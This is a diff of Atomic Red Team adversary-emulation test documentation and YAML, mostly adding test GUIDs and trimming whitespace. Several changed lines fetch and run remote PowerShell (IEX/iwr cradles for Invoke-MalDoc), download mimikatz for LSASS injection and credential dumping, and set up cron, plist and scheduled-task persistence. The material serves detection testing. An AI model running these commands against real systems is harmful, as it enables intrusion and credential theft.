 ```powershell
-if (Test-Path #{SharpView}) {exit 0} else {exit 1} 
+if (Test-Path #{SharpView}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1053.001/T1053.001.md

@@ -17,10 +17,14 @@ This test submits a command to be run in the future by the `at` daemon.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | time_spec | Time specification of when the command should run | String | now + 1 minute|
 | at_command | The command to be run | String | echo Hello from Atomic Red Team|
@@ -40,7 +44,7 @@ echo "#{at_command}" | at #{time_spec}
 ##### Description: The `at` and `atd` executables must exist in the PATH
 ##### Check Prereq Commands:
 ```sh
-which at && which atd 
+which at && which atd
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -49,7 +53,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na
 ##### Description: The `atd` daemon must be running
 ##### Check Prereq Commands:
 ```sh
-systemctl status atd || service atd status 
+systemctl status atd || service atd status
 ```
 ##### Get Prereq Commands:
 ```sh

atomics/T1053.002/T1053.002.md

@@ -22,6 +22,10 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+
+
+
 
 
 

atomics/T1053.003/T1053.003.md

@@ -21,10 +21,14 @@ This test replaces the current user's crontab file with the contents of the refe
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | /tmp/evil.sh|
 | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
@@ -56,10 +60,14 @@ This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in cron folder | string | persistevil|
@@ -96,10 +104,14 @@ This test adds a script to a /var/spool/cron/crontabs folder configured to execu
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|

atomics/T1053.004/T1053.004.md

@@ -17,10 +17,14 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
 | script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|

atomics/T1053.005/T1053.005.md

@@ -30,6 +30,10 @@ the tasks, open the Task Scheduler and look in the Active Tasks pane.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
+
+
+
 
 
 
@@ -60,10 +64,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -96,10 +104,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -135,6 +147,10 @@ Upon successful execution, powershell.exe will create a scheduled task to spawn
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
+
+
+
 
 
 
@@ -169,10 +185,14 @@ This module utilizes the Windows API to schedule a task for code execution (note
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -181,7 +201,8 @@ This module utilizes the Windows API to schedule a task for code execution (note
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
 ```
 
@@ -197,7 +218,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -216,6 +237,10 @@ Create an scheduled task that executes notepad.exe after user login from XML by
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+
+
+
 
 
 

atomics/T1053.005/T1053.005.yaml

@@ -127,7 +127,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
     name: powershell
 - name: WMI Invoke-CimMethod Scheduled Task

atomics/T1053.006/T1053.006.md

@@ -19,10 +19,14 @@ This test creates Systemd service and timer then starts and enables the Systemd
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service|
 | path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer|

atomics/T1053.007/T1053.007.md

@@ -19,10 +19,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|
 
@@ -48,10 +52,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|
 

atomics/T1055.001/T1055.001.md

@@ -24,10 +24,14 @@ With default arguments, expect to see a MessageBox, with notepad's icon in taskb
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
 | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll|
@@ -48,7 +52,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
 ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1055.004/T1055.004.md

@@ -29,10 +29,14 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_binary | Output Binary | Path | PathToAtomicsFolder\T1055.004\bin\T1055.exe|
 

atomics/T1055.012/T1055.012.md

@@ -22,10 +22,14 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
 | parent_process_name | Name of the parent process | string | explorer|
@@ -60,10 +64,14 @@ This module executes notepad.exe from within the WINWORD.EXE process
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -72,7 +80,8 @@ This module executes notepad.exe from within the WINWORD.EXE process
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
 ```
 
@@ -88,7 +97,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1055.012/T1055.012.yaml

@@ -59,6 +59,7 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
     name: powershell

atomics/T1055/T1055.md

@@ -25,6 +25,10 @@ is required.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
+
+
+
 
 
 
@@ -32,7 +36,8 @@ is required.
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
 ```
 
@@ -48,7 +53,7 @@ try {
   $path = $wdApp.Path
   Stop-Process -Name "winword"
   if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +75,14 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | machine | machine to target (via psexec) | string | DC1|
 | mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
@@ -95,11 +104,12 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -108,10 +118,11 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
 Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
 New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null

atomics/T1055/T1055.yaml

@@ -26,7 +26,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
     name: powershell
 - name: Remote Process Injection in LSASS via mimikatz
@@ -60,6 +61,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -69,6 +71,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
       Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
       New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null

atomics/T1056.001/T1056.001.md

@@ -29,10 +29,14 @@ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and outp
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filepath | Name of the local file, include path. | Path | $env:TEMP\key.log|
 
@@ -67,6 +71,10 @@ Use 'aureport --tty' or other audit.d reading tools to read the log output, whic
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
+
+
+
 
 
 

atomics/T1056.002/T1056.002.md

@@ -20,6 +20,10 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
+
+
+
 
 
 
@@ -46,6 +50,10 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+
+
+
 
 
 

atomics/T1056.004/T1056.004.md

@@ -20,10 +20,14 @@ Hooks functions in PowerShell to read TLS Communications
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | Dll To Inject | Path | PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll|
 | server_name | TLS Server To Test Get Request | Url | https://www.example.com|
@@ -44,7 +48,7 @@ curl #{server_name} -UseBasicParsing
 ##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1057/T1057.md

@@ -21,10 +21,14 @@ Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | path of output file | path | /tmp/loot.txt|
 
@@ -57,6 +61,10 @@ Upon successful execution, cmd.exe will execute tasklist.exe to list processes.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
+
+
+
 
 
 

atomics/T1059.001/T1059.001.md

@@ -55,10 +55,14 @@ Download Mimikatz and dump credentials. Upon execution, mimikatz dump details an
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
 
@@ -86,10 +90,14 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path for SharpHound payload | String | PathToAtomicsFolder\T1059.001\src|
 
@@ -115,7 +123,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
 ##### Description: SharpHound.ps1 must be located at #{file_path}
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -136,6 +144,10 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
+
+
+
 
 
 
@@ -167,6 +179,10 @@ Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
+
+
+
 
 
 
@@ -193,6 +209,10 @@ Run mimikatz via PsSendKeys. Upon execution, automated actions will take place t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
+
+
+
 
 
 
@@ -219,6 +239,10 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
+
+
+
 
 
 
@@ -245,10 +269,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1|
 
@@ -276,10 +304,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml|
 
@@ -307,10 +339,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct|
 
@@ -337,6 +373,10 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
+
+
+
 
 
 #### Run it with these steps! 
@@ -359,6 +399,10 @@ art-marker.txt is in the folder.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
+
+
+
 
 
 
@@ -392,6 +436,10 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
+
+
+
 
 
 
@@ -409,7 +457,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion
 ##### Description: PowerShell version 2 must be installed
 ##### Check Prereq Commands:
 ```powershell
-if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} 
+if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -428,10 +476,14 @@ Creates a file with an alternate data stream and simulates executing that hidden
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt|
 
@@ -456,7 +508,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore
 ##### Description: Homedrive must be an NTFS drive
 ##### Check Prereq Commands:
 ```powershell
-if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} 
+if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -476,10 +528,14 @@ Upon execution, network test info and 'T1086 PowerShell Session Creation and Use
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME|
 
@@ -508,7 +564,7 @@ Try {
 } 
 Catch {
     exit 1
-} 
+}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -527,10 +583,14 @@ Executes powershell.exe with variations of the -Command parameter
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -552,7 +612,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -571,10 +631,14 @@ Executes powershell.exe with variations of the -Command parameter with encoded a
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -597,7 +661,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -616,10 +680,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
@@ -641,7 +709,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -660,10 +728,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter with en
 **Supported Platforms:** Windows
 
 
